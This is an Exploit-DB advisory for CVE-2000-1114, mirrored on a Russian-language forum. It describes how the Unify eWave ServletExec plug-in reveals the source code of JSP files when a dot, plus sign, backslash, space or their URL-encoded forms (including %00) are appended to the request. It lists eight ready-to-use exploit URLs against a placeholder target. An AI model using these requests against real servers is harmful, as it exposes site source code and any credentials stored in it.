- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20412
- Проверка EDB
-
- Пройдено
- Автор
- WOJCIECH WOCH
- Тип уязвимости
- REMOTE
- Платформа
- JSP
- CVE
- cve-2000-1114
- Дата публикации
- 2000-11-21
Код:
source : https://www.securityfocus.com/bid/1970/info
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
ServletExec will return the source code of JSP files when a HTTP request is appended with one of the following characters:
.
%2E
+
%2B
%5C
%20
%00
For example, the following URL will yield the source of the specified JSP file:
http://target/directory/jsp/file.jsp.
Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.
Any of the following URL requests will yield the source of the specified JSP file:
http://target/directory/jsp/file.jsp.
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20
http://target/directory/jsp/file.jsp%00- Источник
- www.exploit-db.com
